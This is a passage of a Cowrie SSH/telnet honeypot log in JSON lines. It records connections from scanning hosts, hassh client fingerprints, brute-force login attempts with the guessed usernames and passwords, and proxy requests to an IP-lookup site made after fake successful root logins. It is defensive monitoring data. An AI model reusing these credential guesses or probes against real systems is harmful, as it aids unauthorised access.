om","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:41:17.250405Z","src_ip":"212.227.235.229","session":"e7c7ce7c2655"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"Admin@9000","message":"login attempt [Administrator/Admin@9000] failed","sensor":"my-vps","timestamp":"2025-08-28T00:41:17.575267Z","src_ip":"212.227.235.229","session":"e7c7ce7c2655"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:41:18.685805Z","src_ip":"212.227.235.229","session":"e7c7ce7c2655"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55911,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6b3acb80bed","protocol":"telnet","message":"New connection: 212.227.235.229:55911 (1.2.3.4:23) [session: e6b3acb80bed]","sensor":"my-vps","timestamp":"2025-08-28T00:41:22.479303Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46218,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a031f64c81","protocol":"ssh","message":"New connection: 212.227.125.160:46218 (1.2.3.4:22) [session: f6a031f64c81]","sensor":"my-vps","timestamp":"2025-08-28T00:41:45.821913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:41:45.825255Z","src_ip":"212.227.125.160","session":"f6a031f64c81"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:41:46.058898Z","src_ip":"212.227.125.160","session":"f6a031f64c81"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:41:47.407331Z","src_ip":"212.227.125.160","session":"f6a031f64c81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:41:48.173927Z","session":"f6a031f64c81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:41:48.411257Z","src_ip":"212.227.125.160","session":"f6a031f64c81"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:41:48.648764Z","src_ip":"212.227.125.160","session":"f6a031f64c81"}
{"eventid":"cowrie.session.closed","duration":31.40914750099182,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:41:53.888357Z","src_ip":"212.227.235.229","session":"e6b3acb80bed"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":46938,"dst_ip":"1.2.3.4","dst_port":22,"session":"345c0e8b998c","protocol":"ssh","message":"New connection: 171.243.151.203:46938 (1.2.3.4:22) [session: 345c0e8b998c]","sensor":"my-vps","timestamp":"2025-08-28T00:42:17.024518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:42:17.029018Z","src_ip":"171.243.151.203","session":"345c0e8b998c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:42:18.719640Z","src_ip":"171.243.151.203","session":"345c0e8b998c"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:42:19.535506Z","src_ip":"171.243.151.203","session":"345c0e8b998c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.151.203","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:42:20.233998Z","session":"345c0e8b998c"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":41458,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9202e8916fe","protocol":"ssh","message":"New connection: 171.243.150.245:41458 (1.2.3.4:22) [session: f9202e8916fe]","sensor":"my-vps","timestamp":"2025-08-28T00:42:20.248443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:42:20.368216Z","src_ip":"171.243.150.245","session":"f9202e8916fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:42:20.437568Z","src_ip":"171.243.151.203","session":"345c0e8b998c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:42:20.464247Z","src_ip":"171.243.150.245","session":"f9202e8916fe"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:42:21.371477Z","src_ip":"171.243.151.203","session":"345c0e8b998c"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-28T00:42:23.851173Z","src_ip":"171.243.150.245","session":"f9202e8916fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44926,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8009656cebf","protocol":"ssh","message":"New connection: 212.227.125.160:44926 (1.2.3.4:22) [session: e8009656cebf]","sensor":"my-vps","timestamp":"2025-08-28T00:42:25.046424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:42:25.047398Z","src_ip":"212.227.125.160","session":"e8009656cebf"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:42:25.079431Z","src_ip":"171.243.150.245","session":"f9202e8916fe"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:42:25.339349Z","src_ip":"212.227.125.160","session":"e8009656cebf"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:42:33.047310Z","src_ip":"212.227.125.160","session":"e8009656cebf"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":36966,"dst_ip":"1.2.3.4","dst_port":22,"session":"422d9d7a85d6","protocol":"ssh","message":"New connection: 194.233.79.134:36966 (1.2.3.4:22) [session: 422d9d7a85d6]","sensor":"my-vps","timestamp":"2025-08-28T00:42:33.848212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:42:35.333331Z","src_ip":"194.233.79.134","session":"422d9d7a85d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:42:35.334118Z","src_ip":"194.233.79.134","session":"422d9d7a85d6"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T00:42:36.324955Z","src_ip":"194.233.79.134","session":"422d9d7a85d6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:42:38.077591Z","src_ip":"194.233.79.134","session":"422d9d7a85d6"}
{"eventid":"cowrie.session.connect","src_ip":"1.92.34.210","src_port":53374,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f5ac37f75b4","protocol":"ssh","message":"New connection: 1.92.34.210:53374 (1.2.3.4:22) [session: 7f5ac37f75b4]","sensor":"my-vps","timestamp":"2025-08-28T00:42:54.971049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:42:54.971968Z","src_ip":"1.92.34.210","session":"7f5ac37f75b4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:42:55.181731Z","src_ip":"1.92.34.210","session":"7f5ac37f75b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54192,"dst_ip":"1.2.3.4","dst_port":22,"session":"d57d12da0370","protocol":"ssh","message":"New connection: 212.227.125.160:54192 (1.2.3.4:22) [session: d57d12da0370]","sensor":"my-vps","timestamp":"2025-08-28T00:42:59.882907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:42:59.895483Z","src_ip":"212.227.125.160","session":"d57d12da0370"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nis